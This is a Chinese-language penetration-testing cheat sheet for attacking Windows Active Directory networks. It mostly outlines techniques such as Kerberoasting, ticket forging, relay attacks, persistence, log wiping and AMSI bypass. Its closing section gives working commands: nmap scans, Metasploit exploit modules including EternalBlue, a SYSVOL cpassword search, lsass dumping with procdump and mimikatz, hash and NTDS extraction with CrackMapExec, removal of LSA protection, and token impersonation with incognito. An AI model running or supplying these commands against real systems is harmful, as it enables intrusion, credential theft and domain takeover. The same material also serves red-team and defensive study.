1.无凭证情况下
网络扫描
漏洞快速探测
提权
拥有本地管理员权限
获取密码
绕过LSA防护策略读取密码
token窃取
查看本地存储的所有密码
卷影拷贝(获取域控所有hash)
dpapi解密
2.内网信息收集
本机信息收集
8.获取当前用户密码
Windows
Linux
浏览器
Navicat密码
xshell&xftp密码
mRemoteNG密码
扩散信息收集
常用端口扫描工具
内网拓扑架构分析
常见信息收集命令
第三方信息收集
3.获取域控的方法
SYSVOL
MS14-068 Kerberos
SPN扫描
Kerberos的黄金门票
Kerberos的银票务
域服务账号破解
凭证盗窃
NTLM relay
Kerberos委派
地址解析协议
zerologon漏洞
CVE-2021-42278 && CVE-2021-42287
4.列出可匿名访问的SMB共享
5.枚举LDAP
6.查找用户名
得到账号,但是没有密码
密码喷洒
ASREP-Roasting攻击
获取hash
获取ASREP-Roastable账号
拿到任意一个域用户的账号密码
获取其他账户密码
1.获取域内所有账户名
2.枚举 SMB 共享
3.bloodhound
4.powerview / pywerview
Kerberoasting攻击
获取hash
查找 kerberoastable 账号
MS14-068
PrintNightmare
枚举 DNS 服务器
7.relay/poisoning攻击
扫描没开启SMB签名的机器
PetitPotam
监听
无SMB签名 || 开启IPv6 || ADCS
1.MS08-068
2.mitm6 -i eth0 -d
3.adcs
拿到hash破解
1.LM
2.NTLM
3.NTLMv1
4.NTLMv2
5.Kerberos 5 TGS
6.Kerberos ASREP
9.横向移动
1.PTH
2.PTK
3.非约束委派
获取票据
查找非约束委派主机
4.约束委派
获取票据
查找约束委派主机
5.基于资源的约束委派
6.dcsync
7.打印机 SpoolService 漏洞利用
8.AD域ACL攻击(aclpwn.py)
9.获取LAPS管理员密码
10.privexchange漏洞
Exchange的利用
11.IPC
12.其他横移
10.权限维持
拿到域控权限
后门
域信任关系
子域攻击父域 - SID History版跨域黄金票据
利用域信任密钥获取目标域的权限 - 信任票据
攻击其它林
活动目录持久性技巧
Security Support Provider
SID History
AdminSDHolder&SDProp
Dcsync后门
组策略
Hook PasswordChangeNotify
Kerberoasting后门
AdminSDHolder
Delegation
11.敏感文件
windows
Linux
12.权限提升
Windows
bypass UAC
常用方法
常用工具
提权
Linux
内核溢出提权
计划任务
SUID
环境变量
系统服务的错误权限配置漏洞
不安全的文件/文件夹权限配置
找存储的明文用户名,密码
13.权限维持
Windows
1、密码记录工具
2、常用的存储Payload位置
3、Run/RunOnce Keys
4、BootExecute Key
5、Userinit Key
6、Startup Keys
7、Services
8、Browser Helper Objects
9、AppInit_DLLs
10、文件关联
11、bitsadmin
12、mof
13、wmi
14、Userland Persistence With Scheduled Tasks
15、Netsh
16、Shim
17、DLL劫持
18、DoubleAgent
19、waitfor.exe
20、AppDomainManager
21、Office
22、CLR
23、msdtc
24、Hijack CAccPropServicesClass and MMDeviceEnumerato
25、Hijack explorer.exe
26、Windows FAX DLL Injection
27、特殊注册表键值
28、快捷方式后门
29、Logon Scripts
30、Password Filter DLL
31、利用BHO实现IE浏览器劫持
Linux
crontab
硬链接sshd
SSH Server wrapper
SSH keylogger
Cymothoa_进程注入backdoor
rootkit
Tools
14.痕迹清理
Windows日志清除
破坏Windows日志记录功能
Metasploit
3389登陆记录清除
15.内网穿透
0x01 场景与思路分析
场景一:内网防火墙对出口流量没有任何端口限制
场景二:内网防火墙仅允许内网主机访问外网的特定端口(如:80, 443)
场景三:TCP不出网-HTTP代理
场景四 TCP出网-socks代理
0x02 Lcx
端口转发
端口映射
0x03 SSH隧道
SSH本地转发
SSH远程转发
SSH动态转发,正向代理做动态的端口转发
SSH动态转发,正向代理进行单一的端口转发
16.Bypass AMSI
一键关闭AMSI
powershell降级
内存补丁
1.无凭证情况下
网络扫描
漏洞快速探测
扫描后可以去先用已知漏洞打
提权
低权限可以做的事情
cme smb <ip_range> # SMB 扫描存活主机
nmap -sP -p <ip> # ping 扫描
nmap -PN -sV --top-ports 50 --open <ip> # 快速扫描
nmap -PN --script smb-vuln* -p139,445 <ip> # 检测 SMB 漏洞
nmap -PN -sC -sV <ip> # 经典扫描
nmap -PN -sC -sV -p- <ip> # 全扫描
nmap -sU -sC -sV <ip> # UDP 扫描
java rmi: exploit/multi/misc/java_rmi_server
ms17-010:exploit/windows/smb/ms17_010_eternalblue
tomcat:auxiliary/scanner/http/tomcat_enum
jboss manager:exploit/multi/http/tomcat_mgr_deploy
Java反序列化漏洞测试:ysoserial
查找产品的CVE漏洞:searchsploit
MS14-025: searchsploit
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
爆破数据库连接:use admin/mssql/mssql_enum_sql_logins
proxylogon:
proxyshell:
拥有本地管理员权限
获取密码
绕过LSA防护策略读取密码
token窃取
之前粗略分析过 token
Token窃取那些事 (0range-x.github.io)
winpeas.exe
查找内容有 password 的文件:findstr /si 'password' *.txt *.xml *.docx
Juicy Potato / Lovely Potato
PrintSpoofer
RoguePotato
SMBGhost CVE-2020-0796
CVE-2021-36934 (HiveNightmare/SeriousSAM)
......
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp"
"sekurlsa::logonPasswords" "exit"
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords"
"lsadump::sam" "exit"
hashdump: post/windows/gather/smart_hashdump
cme smb <ip_range> -u <user> -p <password> -M lsassy
cme smb <ip_range> -u <user> -p '<password>' --sam / --lsa / --ntds
PPLdump64.exe <lsass.exe|lsass_pid> lsass.dmp
mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug"
"token::elevate" "sekurlsa::logonpasswords" "!processprotect
/process:lsass.exe" "!-" #with mimidriver.sys
.\incognito.exe list_tokens -u
.\incognito.exe execute -c "<domain>\<user>" powershell.exe
use incognito
impersonate_token <domain>\\<user>
